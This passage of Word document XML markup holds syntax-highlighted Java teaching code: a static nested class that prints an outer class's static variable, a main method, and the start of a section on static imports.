          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nested</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F9877F" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CFEAF4" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Static variable from outer class: "</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> staticVar</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277567FC" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E23041D" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0061B703" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB6A5D6" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D04E1FA" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5E16E1" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A06E28" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Outer</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nested</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> nested </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Outer</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nested</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AEEC1D" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        nested</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>display</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Outputs: Static variable from outer class: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A510D8" w14:textId="77777777"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE100C0" w14:textId="2A3EA796"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754776"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10081BD1" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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Static Import</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221FDEF8" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Java, you can use static import to access static members (variables and methods) of a class directly without qualifying them with the class name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB992DB" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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6630047C" w14:textId="77777777"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5225461"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Math</w:t>
      </w:r>
      <w:r w:rsidRPr="0014275E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2903DA" w14:textId="77777777"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5225461"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
